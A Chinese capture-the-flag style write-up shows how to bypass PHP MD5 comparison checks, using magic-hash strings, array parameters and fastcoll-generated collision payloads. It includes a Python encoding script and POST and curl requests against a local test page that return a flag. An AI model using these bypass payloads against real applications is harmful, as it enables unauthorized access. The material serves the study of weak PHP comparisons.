ps:

== 和 != 比较若类型不同,先偿试转换类型,再作值比较,最后返回值比较结果
而=== 和 !== 只有在相同类型下,才会比较其值

0x00

if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

绕过方式: param1=240610708&param2=QNKCDZO

0x01

if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

===强类型,md5的值不进行类型转换,当作字符串处理.需要用数组进行绕过
绕过方式:param1[]=123&param2[]=1231

0x02

if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

var_dump(md5('240610708') === md5('QNKCDZO'));  #False
数组绕过不行会报错
绕过方式:MD5碰撞

fastcoll 生成md5相同的文件:

E:\ctf工具\ctf工具\加解密工具\MD5碰撞\fastcoll_v1.0.0.5>fastcoll_v1.0.0.5.exe -o p1.txt p2.txt
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'p1.txt' and 'p2.txt'
Using initial value: 0123456789abcdeffedcba9876543210

Generating first block: .......
Generating second block: S11...................
Running time: 1.892 s

因为文件含有很多不可打印字符所以进行url编码:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/10/6 下午 09:13

import urllib

f1 = open('p1.txt','rb')
f2 = open('p2.txt','rb')
param1 = urllib.quote(f1.read())
param2 = urllib.quote(f2.read())
print('param1='+param1+'&param2='+param2)

本地测试:(使用bp,hackbar会再进行一次url编码)

POST /md5_test/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/md5_test/
Content-Type: application/x-www-form-urlencoded
Content-Length: 317
Connection: close
Upgrade-Insecure-Requests: 1

param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

或者curl 直接请求:

C:\Users\徐超>curl -v http://127.0.0.1/md5_test/ -H "Cookie: PHPSESSID=True" --data "param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> POST /md5_test/ HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 317
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 317 out of 317 bytes
< HTTP/1.1 200 OK
< Date: Sat, 06 Oct 2018 13:25:41 GMT
< Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
< X-Powered-By: PHP/5.5.38
< Content-Length: 27
< Content-Type: text/html
<
seclab507{php_is_weak_____}* Connection #0 to host 127.0.0.1 left intact

挺有意思的网站:https://www.mscs.dal.ca/~selinger/md5collision/

php

preView